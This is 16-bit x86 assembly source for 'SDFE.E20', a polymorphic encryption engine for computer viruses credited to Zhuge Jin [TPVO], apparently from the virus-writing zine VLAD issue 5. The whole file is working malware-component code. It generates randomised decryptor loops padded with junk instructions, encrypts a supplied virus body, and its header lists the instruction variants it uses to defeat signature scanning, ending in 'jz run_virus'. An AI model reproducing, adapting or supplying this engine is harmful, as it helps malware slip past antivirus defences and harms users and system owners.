;
; SDFE.E20 by Zhuge Jin [TPVO]
;
; SDFE.E20 was modified from SDFE20.
; It has many differences:
;
;Initialise register
; 1) mov reg,xxxxh
; 2) xor reg,reg \ xor reg,xxxxh
; sub reg,reg \ add reg,xxxxh
; rol reg,xxh - or reg,xxxxh
; rol reg,xxh /
; and reg,(xx)xxh /
;Decryptor code
; 1) add [reg(+reg)+((00)00)],xxh
; 2) adc [reg(+reg)+((00)00)],xxh
; 3) xor [reg(+reg)+((00)00)],xxh
; 4) sub [reg(+reg)+((00)00)],xxh
; 5) sbb [reg(+reg)+((00)00)],xxh
;DEC/INC code
; 1) inc(dec) reg (byte,word)
; 2) add(sub) reg,+(-)(00)01h
; 3) lodsb cmpsb scasb
; 4) add reg,xxxxh \/ add reg,xxxxh
; sub reg,xxxxh /\ sub reg,xxxxh
; cmp reg,xxxxh
; jz run_virus
; jmp loop
;
prg_bx dw ?
prg_cx dw ?
prg_dx dw ?
prg_ds dw ?
no_cy db ?
reg_typ db ?
inc_typ db ?
db ?
reg db ?
reg_ext db 00000100b
disp dw ?
j70h_disp dw ?
m80h_disp dw ?
mc0h_disp dw ?
me1_add0 dw ?
me1_add1 dw ?
me1_add2 dw ?
me1_add3 dw ?
mcc1_disp dw ?
mcc2_disp dw ?
xor_id db ?
reg_ext_cod db 03h,05h,06h,07h
cod db 26h,2eh,36h,3eh,91h,98h,0d6h,0ech,0f0h,0f8h,0fah
db 9bh,9fh,0ceh,0cch,0f5h
push_cod db 06h,0eh,16h,1eh,50h,51h,52h,53h,54h,55h,56h,57h
db 9ch,0ffh,0ffh,0ffh
int_cod db 01h,04h, 06h,08h, 11h,12h, 2ch,2dh, 34h,3eh, 50h,58h
db 5dh,5fh, 68h,6fh
jmp_cod db 68h,0e8h,0e9h,0ebh
SDFE:
cld
mov cs:prg_bx,bx ; save para ...
mov cs:prg_cx,cx
mov cs:prg_dx,dx
mov cs:prg_ds,ds
make_again:
push cs
pop ds
xor di,di
call make_rnd_cod
push es ; init var ...
push cs
pop es
xor ax,ax
mov cx,0009h
mov di,OFFSET j70h_disp
repz stosw
pop es
call rnd_b01
mov ds:inc_typ,al
xor di,di
call make_eng1
call make_eng2
push es ; set return para ...
pop ds
mov cx,di
xor dx,dx
ret
make_rnd_cod:
in ax,40h
add ax,2e4dh
neg ax
stosw
cmp di,0500h
jb make_rnd_cod
ret
rnd_b01:
in al,40h
xor al,es:[di]
and al,01h
ret
rnd_b03:
in al,40h
xor al,es:[di]
and al,03h
ret
rnd_w03:
call rnd_b03
cbw
ret
rnd_b07:
in al,40h
and al,07h
ret
rnd_w07:
call rnd_b07
cbw
ret
maddi:
and al,01h
cbw
add di,ax
inc di
ret
mor_rnd:
call rnd_b07
mov dh,al
test byte ptr ds:reg_typ,01h
jnz mor_rnd_a
and dh,00000011b
mor_rnd_a:
cmp dh,00000100b
jz mor_rnd
cmp dh,ds:reg
jz mor_rnd
cmp dh,ds:reg_ext
jz mor_rnd
ret
mor1:
call mor_rnd
shl al,03h
mov dl,al
in al,40h
and al,11000111b
or al,dl
ret
mor2:
call mor_rnd
mov dl,al
in al,40h
and al,11111000b
or al,dl
ret
make_eng1:
call make_tsh_cod
me1_a0:
cmp di,1024
jb make_eng1
call rnd_b07
cmp al,00000011b ; set reg ...
jz me1_a1
cmp al,00000101b
jae me1_a1
jmp me1_a0
me1_a1:
mov ds:reg,al
mov ah,al
call rnd_b01
jz me1_a3
call rnd_b01
and ah,00000110b
cmp ah,00000110b
jz me1_a2
add al,02h
me1_a2:
mov bx,OFFSET reg_ext_cod
xlatb
mov ds:reg_ext,al
me1_a3:
call make_cfs_cod_2a
call make_tsh_cod
call make_cfs_cod_1a
call make_tsh_cod
call make_tsh_cod
call make_ini_cod ; make init code
mov ds:me1_add1,di
stosw
call make_tsh_cod
mov ds:me1_add0,di ; set loop adress
call make_tsh_cod
mov ax,word ptr ds:reg
cmp ah,00000100b
jz me1_a4
push ax
xchg ah,al
mov word ptr ds:reg,ax
call make_zero_cod
pop word ptr ds:reg
me1_a4:
call make_tsh_cod
call rnd_b01
jz me1_a5
call make_xor_cod1 ; make xor code
call make_cfs_cod_1b
call make_tsh_cod
call make_inc_cod ; make inc code
and bp,7fffh
jmp me1_a6
me1_a5:
call make_inc_cod ; make inc code
call make_tsh_cod
call make_xor_cod1 ; make xor code
call make_cfs_cod_1b
or bp,8000h
me1_a6:
call make_tsh_cod
mov al,81h ; cmp reg,xxxxh
stosb
mov al,11111000b
or al,ds:reg
stosb
mov ds:me1_add2,di
stosw
call make_tsh_nocy ; no carry trash code ???
mov al,74h ; jz xxxxh
stosw
mov ds:me1_add3,di
call make_tsh_cod
mov al,0e9h ; jmp xxxxh
stosb
mov ax,ds:me1_add0
sub ax,di
dec ax
dec ax
stosw
call make_tsh_cod
mov bx,ds:me1_add3
mov ax,di
sub ax,bx
mov es:[bx-01h],al
cmp al,80h
jb me1_a7
pop ax
jmp make_again
me1_a7:
ret
make_cfs_cod_1a:
call rnd_b01
or al,0c6h ; mov [xxxxh],xx(xx)h
mov ah,00000110b
stosw
mov ds:mcc1_disp,di
stosw
call maddi
ret
make_cfs_cod_1b:
mov bx,ds:mcc1_disp
lea si,[di-04h]
mov ax,si
add ax,ds:prg_bx
mov es:[bx],ax
mov ax,es:[si]
test byte ptr es:[bx-02h],01h
jnz mcc1b_a
xchg al,es:[bx+02h]
mov es:[si],al
ret
mcc1b_a:
xchg ax,es:[bx+02h]
mov es:[si],ax
ret
mcc2_cod db 00110110b,00110110b ;xor/xor
db 00110110b,00110110b ;xor/xor
db 00000110b,00101110b ;add/sub
db 00101110b,00000110b ;sub/add
make_cfs_cod_2a:
call rnd_b03
add al,al
mov ah,al
mov bx,OFFSET mcc2_cod
xlatb
xchg ah,al
inc ax
xlatb
mov ds:[mcc2b_buff+01h],al
call rnd_b03
or al,80h
stosw
mov ds:mcc2b_buff,al
mov ds:mcc2_disp,di
stosw
cmp al,81h
jnz mcc2a_a
inc di
mcc2a_a:
inc di
ret
make_cfs_cod_2b:
mov bx,ds:mcc2_disp
mov si,OFFSET me1_add0
call rnd_w03
add ax,ax
add si,ax
mov ax,ds:[si]
dec ax
dec ax
mov word ptr ds:[mcc2b_buff+02h],ax
add ax,ds:prg_bx
mov es:[bx],ax
mov ax,es:[bx+02h]
cmp byte ptr ds:mcc2b_buff,81h
jz mcc2b_a1
mov ah,90h
mcc2b_a1:
mov word ptr ds:[mcc2b_buff+04h],ax
jmp mcc2b_a2
mcc2b_a2:
db 26h ; es:
mcc2b_buff db 90h,90h,90h,90h,90h,90h
ret
make_xor_cod1:
call rnd_b07
add al,al
mov ds:xor_id,al
cmp al,08h
jb mxc1_a1
call rnd_b01 ; clc/stc
or al,0f8h
stosb
mov ds:xor_buf,al
call make_tsh_nocy
mxc1_a1:
call rnd_b01
add al,al
or al,80h
stosb
mxc1_a2:
in al,40h
and al,11000000b
cmp al,11000000b
jz mxc1_a2
mov dl,al
mov al,ds:xor_id
mov ah,al
mov bx,OFFSET xor_cod1
xlatb
xchg ah,al
inc ax
xlatb
xchg ah,al
mov ds:[xor_buf+01h],ah
or al,dl
call make_bx_cod
in al,40h
stosb
mov ds:[xor_buf+02h],al
ret
xor_cod1 db 00000000b,2ch ; add/sub
db 00101000b,04h ; sub/add
db 00110000b,34h ; xor
db 00110000b,34h ; xor
db 00010000b,1ch ; adc/sbb
db 00011000b,14h ; sbb/adc
db 00010000b,1ch ; adc/sbb
db 00011000b,14h ; sbb/adc
make_bx_cod:
mov ah,ds:reg
cmp byte ptr ds:reg_ext,00000100b
jz mbc_a
add ah,ds:reg_ext
sub ah,09h
mov byte ptr ds:reg_ext,00000100b
jmp mbc_a2
mbc_a:
cmp ah,00000101b
jz mbc_a1
xor ah,00000010b
cmp ah,01h
jnz mbc_a2
mov ah,00000111b
jmp mbc_a2
mbc_a1:
mov ah,00000110b
test al,11000000b
jnz mbc_a2
or al,01000000b
mbc_a2:
or al,ah
stosb
mov ah,al
push ax
and ah,11000000b
mov al,ah
cmp ah,00h
jz mbc_a4
cmp ah,01000000b
jz mbc_a3
in ax,40h
jmp mbc_a4
mbc_a3:
mov ah,00h
in al,40h
cmp al,80h
jb mbc_a4
mov ah,0ffh
mbc_a4:
mov es:[di],ax
mov ds:disp,ax
pop ax
shr al,06h
cbw
add di,ax
ret
mnc_tab dw OFFSET mnc1,OFFSET mnc2,OFFSET mnc3,OFFSET mnc3
ini1_cod db 29h,2bh,31h,33h
ini2_cod db 11000000b,11001000b,11110000b,11001000b
make_ini_cod:
call rnd_w03
mov si,ax
add si,si
jmp ds:mnc_tab[si]
mnc1:
call make_zero_cod
mnc1_a:
call make_tsh_cod
mov al,81h
stosb
call rnd_b03
mov bx,OFFSET ini2_cod
xlatb
or al,ds:reg
stosb
ret
mnc2:
mov al,ds:reg
or al,0b8h
stosb
ret
mnc3:
call rnd_b07
cmp al,00000100b
jb mnc3_a
cmp al,00000111b
jz mnc3
mov ah,al
shl ah,03h
or ah,11000000b
or ah,ds:reg
mov al,0c1h
stosw
in al,40h
or al,10h
stosb
jmp mnc1_a
mnc3_a:
call rnd_b01
cbw
add ax,ax
add ax,0e081h
or ah,ds:reg
stosw
push ax
xor ax,ax
stosw
pop ax
cmp al,83h
jnz mnc3_ab
dec di
mnc3_ab:
jmp mnc1_a
make_zero_cod:
call rnd_b03
mov bx,OFFSET ini1_cod
xlatb
stosb
mov al,ds:reg
mov ah,al
shl ah,03h
or al,ah
or al,11000000b
stosb
ret
mic_tab dw OFFSET mic1,OFFSET mic2,OFFSET mic3,OFFSET mic4
mic_cod db 11000000b,05h,11101000b,2dh
inc_cod db 0a6h,0a6h,0ach,0aeh
mic1_a:
mov cx,word ptr ds:inc_typ
xor cx,0001h
add cx,cx
dec cx
call make_mic_b2
stosb
mov byte ptr ds:mic1_a_buf,ah
in ax,40h
stosw
mov word ptr ds:[mic1_a_buf+01h],ax
push cx
call make_tsh_cod
pop cx
call make_mic_b2
stosb
mov byte ptr ds:[mic1_a_buf+03h],ah
stosw
mov word ptr ds:[mic1_a_buf+04h],ax
mic_ab1:
xor ax,ax
mic1_a_buf db 90h,90h,90h,90h,90h,90h
cmp ax,cx
jz mic_ab2
inc word ptr es:[di-02h]
inc word ptr ds:[mic1_a_buf+04h]
jmp mic_ab1
mic_ab2:
ret
make_mic_b2:
mov al,81h
stosb
call rnd_b01
cbw
add ax,ax
add ax,OFFSET mic_cod
mov si,ax
mov ax,ds:[si]
or al,ds:reg
ret
make_inc_cod:
call rnd_w03
mov si,ax
add si,si
jmp ds:mic_tab[si]
mic1:
call rnd_b01
jz mic1_a
mov al,ds:inc_typ
shl al,03h
or al,40h
or al,ds:reg
stosb
ret
mic2:
call rnd_b03
or al,81h
mov ah,11000000b
or ah,ds:reg
test byte ptr ds:inc_typ,01h
jz mic2_a1
or ah,00101000b
mic2_a1:
stosw
cmp al,83h
jnz mic2_a2
test si,0001h
jnz mic2_a2
mov al,0ffh
xor byte ptr ds:inc_typ,01h
jmp mic2_a3
mic2_a2:
mov ax,0001h
mic2_a3:
stosw
cmp byte ptr es:[di-04h],81h
jz mic2_a4
dec di
mic2_a4:
ret
mic3:
mov al,0ffh
mov ah,ds:inc_typ
shl ah,03h
or ah,11000000b
or ah,ds:reg
stosw
ret
mic4:
test byte ptr ds:inc_typ,01h
jz mic4_a
mov al,0fdh ; std
stosb
call make_tsh_cod
mic4_a:
mov al,ds:reg
cmp al,00000110b
jb make_inc_cod
call mic4_b
ret
mic4_b:
and al,01h
and ah,00000010b
xor al,ah
mov bx,OFFSET inc_cod
xlatb
stosb
ret
make_tsh_nocy:
mov byte ptr ds:no_cy,01h
call make_tsh_cod
mov byte ptr ds:no_cy,00h
ret
mtc_70h:
mov si,ds:j70h_disp
cmp si,0000h
jz mtc_70h_a
mov ax,di
sub ax,si
cmp ax,0000h
jz mtc_70h_a
mov es:[si-01h],al
mov word ptr ds:j70h_disp,0000h
mtc_70h_a:
ret
mtc_80h:
mov bx,OFFSET m80h_disp
call set_disp
ret
mtc_c0h:
mov bx,OFFSET mc0h_disp
call set_disp
ret
set_disp:
mov si,ds:[bx]
cmp si,0000h
jz sd_a
mov ax,di
add ax,ds:prg_bx
mov es:[si],ax
mov word ptr ds:[bx],0000h
sd_a:
ret
make_tsh_cod:
call rnd_w03
mov cx,ax
adc cx,0003h
mtc_loop:
cmp byte ptr ds:no_cy,01h
jnz mtc_la1
call mtc5
jmp mtc_la2
mtc_la1:
call mtc
mtc_la2:
call mtc_70h
loop mtc_loop
mov word ptr ds:j70h_disp,0000h
ret
mtc:
add ax,es:[di]
neg ax
mov ds:reg_typ,al
cmp al,0a8h ; test al,xxh
jz mtc1_a1
cmp al,0a9h ; test ax,xxxxh
jz mtc1_a2b6
cmp al,0a0h
jz mtc1_a2b6
cmp al,0a1h
jz mtc1_a2b6
cmp al,40h
jae mtc2
mtc1:
mov ah,al ; 04h , 05h ...
and al,07h
cmp al,04h
jb mtc1_a2
and ah,11111101b
mov al,ah
mtc1_a1:
stosb
call maddi
ret
mtc1_a2:
cmp ah,38h
jae mtc1_a2b1
or ah,02h
mtc1_a2b1:
call mor1
mov dl,al
and dl,11000000b
cmp dl,11000000b
jnz mtc1_a2b2
xchg ah,al
stosw
ret
mtc1_a2b2:
cmp dl,00h
jnz mtc1_a2b5
mtc1_a2b3:
and al,00111000b
or al,00000110b
xchg ah,al
stosw
mtc1_a2b4:
in ax,40h
cmp ax,0ffffh
jz mtc1_a2b4
stosw
ret
mtc1_a2b5:
test ah,01h
jnz mtc1_a2b3
xchg ah,al
stosw
mov al,ah
shr al,06h
cbw
add di,ax
ret
mtc1_a2b6:
stosb
jmp mtc1_a2b4
mtc3_:
jmp mtc3
mtc2:
cmp al,70h
jae mtc3_
cmp al,60h
jae mtc2_a2
cmp al,50h
jae mtc2_a3
mtc2_a1:
mov byte ptr cs:reg_typ,01h
call mor2
and al,1fh
or al,40h
cmp al,50h
jae mtc2_a1b1
stosb
ret
mtc2_a1b1:
in al,40h
and al,0fh
mov bx,OFFSET push_cod
xlatb
stosb
cmp al,0ffh
jnz mtc2_a1b2
call mor2
and al,03h
or al,11110000b
stosb
mtc2_a1b2:
call mtc5_a1
mov byte ptr cs:reg_typ,01h
call mor2
and al,47h
test al,40h
jz mtc2_a1b3
mov ah,al
or ah,11000000b
mov al,8fh
stosw
ret
mtc2_a1b3:
or al,58h
stosb
ret
mtc2_a2:
push cx ; int xxh ...
in ax,40h
add ah,al
mov cx,0008h
mov bx,OFFSET int_cod
mtc2_a2b1:
mov dx,ds:[bx]
cmp ah,dl
jae mtc2_a2b2
jmp mtc2_a2b3
mtc2_a2b2:
cmp ah,dh
jbe mtc2_a2b4
mtc2_a2b3:
inc bx
inc bx
loop mtc2_a2b1
pop cx
jmp mtc2_a2
mtc2_a2b4:
mov al,0cdh
stosw
pop cx
ret
mtc2_a3:
and al,00001001b
or al,11110110b
stosb
mov bl,al
mtc2_a3b1:
call rnd_b07
cmp al,00000110b
jae mtc2_a3b1
cmp bl,0feh
jb mtc2_a3b2
and al,01h
mtc2_a3b2:
mov ah,al
call mor2
and al,00000111b
or al,11000000b
shl ah,03h
or al,ah
stosb
mov al,bl
cmp al,0feh
jae mtc2_a3b3
cmp ah,00010000b
jae mtc2_a3b3
call maddi
mtc2_a3b3:
ret
mtc3:
cmp al,0a0h
jae mtc45
cmp al,80h
jae mtc3_a2
in ax,40h
and al,1fh
test al,10h
jnz mtc3_a1
mov bx,OFFSET cod
cbw
add bx,ax
mov ah,ds:[bx]
cmp al,0bh
jae mtc3_a
call rnd_b01
add ah,al
mtc3_a:
mov al,ah
stosb
ret
mtc45:
jmp mtc4
mtc3_a1:
or al,70h ; jxx disp ...
xor ah,ah
stosw
mov ds:j70h_disp,di
ret
mtc3_a2:
call rnd_b03
or al,80h
mov ds:reg_typ,al
stosb
push ax
mtc3_a2b1:
call mor2
mov ah,al
and ah,11000000b
cmp ah,11000000b
jz mtc3_a2b4
cmp ah,00000000b
jz mtc3_a2b2
jmp mtc3_a2b1
mtc3_a2b2:
and al,00111000b
or al,00000110b
stosb
mov ds:m80h_disp,di
call rnd_w07
sub ax,000ah
add ax,ds:me1_add0
cmp word ptr ds:me1_add0,0000h
jnz mtc3_a2b3
mov ax,di
mtc3_a2b3:
add ax,ds:prg_bx
stosb
mov al,ah
mtc3_a2b4:
stosb
pop ax
cmp al,81h
jnz mtc3_a2b5
call mtc_c0h
call mtc_80h
inc di
mtc3_a2b5:
inc di
ret
mtc4:
cmp al,0c0h
jb mtc5
cmp al,0d0h
jb mtc4_a1
cmp al,0e0h
jb mtc4_a2
cmp al,0e4h
jb mtc4_a3
jmp mtc5
mtc4_a1:
mov ah,al
and ah,11110001b
call mor2
or al,11000000b
xchg ah,al
stosw
inc di
ret
mtc4_a2:
mov ah,al
and ah,11110011b
call mor2
or al,11000000b
xchg ah,al
stosw
ret
mtc4_a3:
xor ah,ah
stosw
mov ds:j70h_disp,di
ret
mtc5:
call rnd_b07
cmp al,02h
jz mtc5_a2
cmp al,03h
jz mtc5_a3
mtc5_a1:
call rnd_b01
jz mtc5_a1b1
jmp mtc5_a4
mtc5_a1b1:
call mor2 ; mov reg,xx(xx)h
and al,00000111b
test byte ptr ds:reg_typ,01h
jz mtc5_a1b2
or al,00001000b
mtc5_a1b2:
or al,0b0h
stosb
cmp al,0b8h
jb mtc5_a1b3
call mtc_80h
call mtc_c0h
inc di
mtc5_a1b3:
inc di
ret
mtc5_a2:
call rnd_b01
or al,0c6h
mov ah,00000110b
stosw
mov ds:mc0h_disp,di
push ax
call rnd_w07
sub ax,000ah
add ax,ds:me1_add0
cmp word ptr ds:me1_add0,0000h
jnz mtc5_a2b
mov ax,di
mtc5_a2b:
add ax,ds:prg_bx
stosw
pop ax
call maddi
ret
mtc5_a3:
call rnd_b03
mov bx,OFFSET jmp_cod
xlatb
stosb
cmp al,68h
jz mtc5_a3b3
push ax
call rnd_w07
inc ax
inc ax
stosw
push ax
call mtc_c0h
call mtc_80h
pop ax
add di,ax
pop ax
cmp al,0e8h
jnz mtc5_a3b1
mov byte ptr ds:reg_typ,01h
call mor2
and al,00000111b
or al,58h
stosb
mtc5_a3b1:
cmp al,0ebh
jnz mtc5_a3b2
dec di
mtc5_a3b2:
ret
mtc5_a3b3:
push di
inc di
inc di
call mtc5_a1
call rnd_b01
or al,0c2h
stosb
cmp al,0c3h
jz mtc5_a3b4
xor ax,ax
stosw
mtc5_a3b4:
pop si
call rnd_w07
add di,ax
mov ax,di
add ax,ds:prg_bx
mov es:[si],ax
jmp mtc5_a3b2
mtc5_a4:
call rnd_b03
add al,88h
stosb
mov ds:reg_typ,al
cmp al,8ah
jb mtc5_a4b1
call mor1
jmp mtc5_a4b2
mtc5_a4b1:
call mor2
mtc5_a4b2:
or al,11000000b
stosb
ret
make_eng2:
mov bx,ds:me1_add1
test byte ptr ds:inc_typ,01h
jz me2_a1
mov bx,ds:me1_add2
me2_a1:
call set_count
mov cx,ds:prg_cx
lds si,dword ptr ds:prg_dx
me2_a:
lodsb
xor_buf db 90h,90h,90h
stosb
loop me2_a
push cs
pop ds
mov bx,ds:me1_add2
test byte ptr ds:inc_typ,01h
jz me2_a3
mov bx,ds:me1_add1
me2_a3:
call set_count
call make_cfs_cod_2b
ret
set_count:
mov ax,di
add ax,ds:prg_bx
sub ax,ds:disp
mov dx,word ptr ds:inc_typ
sub ax,dx
test bp,8000h
jz sc_a
add ax,dx
add ax,dx
dec ax
sc_a:
mov es:[bx],ax
ret
SDFE_E:
- VLAD #5 INDEX -